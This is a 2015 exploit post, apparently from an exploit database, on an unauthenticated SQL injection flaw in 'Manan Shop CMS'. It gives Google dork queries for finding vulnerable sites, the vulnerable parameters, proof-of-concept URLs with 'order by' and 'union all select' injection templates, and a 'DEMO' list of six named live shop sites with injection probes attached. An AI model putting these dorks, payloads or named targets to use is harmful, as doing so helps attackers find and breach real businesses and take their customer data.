`=========================================================
[+] Title :- Manan Shop CMS - SQL Injection Vulnerability
[+] Date :- 4 - July - 2015
[+] Vendor Homepage :- http://www.manan.asia/
[+] Version :- All Versions
[+] Tested on :- Nginx/1.4.5, PHP/5.2.17, Linux - Windows
[+] Category :- webapps
[+] Google Dorks :- "Designed & Developed by Manan"
"Designed & Developed by Manan" "php?cat="
"Designed & Developed by Manan" +inurl:/.php?itemid=
[+] Exploit Author :- Shelesh Rauthan (ShOrTy420 aKa SEB@sTiaN)
[+] Team name :- Team Alastor Breeze, Intelligent-Exploit
[+] Official Website :- serverfarming.com, intelligentexploit.com
[+] The official Members :- Sh0rTy420, P@rL0u$, !nfIn!Ty, Th3G0v3Rn3R, m777k
[+] Greedz to :- @@lu, Lalit, MyLappy<3, Diksha, DK
[+] Contact :- fb.com/shelesh.rauthan, [email protected], [email protected]
=========================================================
[+] Severity Level :- High
[+] Request Method(s) :- GET / POST
[+] Vulnerable Parameter(s) :- itemid, numberofitems, catname, cat
[+] Affected Area(s) :- Entire admin, database, Server
[+] About :- Unauthenticated SQL Injection via Multiple Php Files causing an SQL error
[+] SQL vulnerable File :- /home1/outboxi1/public_html/DOMAIN.com/products_view.php
[+] POC :- http://127.0.0.1/index.php?id=[SQL]'
The sql Injection web vulnerability can be be exploited by remote attackers without any privilege of web-application user account or user interaction.
PoC:
http://www.[WEBSITE].com/index.php?cat=1&catname=Women&subcat=all&numberofitems=-9' order by [SQL INJECTION]--+
http://www.[WEBSITE].com/index.php?cat=1&catname=Women&subcat=all&numberofitems=-9' union all select [SQL INJECTION]--+
[+] DEMO :- http://www.etalage-id.com/index.php?cat=1&catname=Women&subcat=all&numberofitems=9%27
http://www.chloeprincess.com/index.php?cat=1&catname=Latest%20Collection&subcat=4&subcatname=ALL&itemid=2014%27
http://www.coralicekids.com/index.php?cat=100&catname=NewArrival&subcat=&subcatname=&itemid=2267%27
http://www.kamiidea.com/index.php?cat=7&catname=Accessories&subcat=32&subcatname=Shoes%27
http://www.loewyshop.com/index.php?cat=101&catname=Sale&subcat=all&subcatname=&itemid=46%27
http://www.outboxidea.com/ribbonshopstore.com/index.php?cat=100&catname=Bags&subcat=&subcatname=&itemid=464%27
=======================================================
`